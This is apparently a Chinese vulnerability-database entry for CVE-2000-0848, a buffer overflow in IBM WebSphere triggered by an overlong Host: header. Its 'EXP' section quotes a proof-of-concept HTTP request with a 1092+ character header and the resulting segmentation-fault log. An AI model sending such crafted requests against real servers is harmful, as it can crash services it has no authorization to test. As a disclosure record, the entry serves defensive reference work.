IBM WebSphere web application server (WAS)缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106002 漏洞类型 缓冲区溢出
发布时间 2000-09-15 更新时间 2006-08-21
CVE编号 CVE-2000-0848 CNNVD-ID CNNVD-200011-031
漏洞平台 Multiple CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200011-031
|漏洞详情
IBMWebSpherewebapplicationserver(WAS)存在缓冲区溢出漏洞。远程攻击者借助超长Host:请求头执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1691/info

Large amounts of data (ie 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS). 

GET /servletsnoop HTTP/1.0
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters)

resulted in the following IBMHTTPD log entry:

[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation
Fault (11)
|参考资料

来源:BID
名称:1691
链接:http://www.securityfocus.com/bid/1691
来源:BUGTRAQ
名称:20000915WebSphereapplicationserverpluginissue&vendorfix
链接:http://archives.neohapsis.com/archives/bugtraq/2000-09/0192.html
来源:www-4.ibm.com
链接:http://www-4.ibm.com/software/webservers/appserv/doc/v3022/fxpklst.htm#Security
来源:XF
名称:websphere-header-dos
链接:http://xforce.iss.net/static/5252.php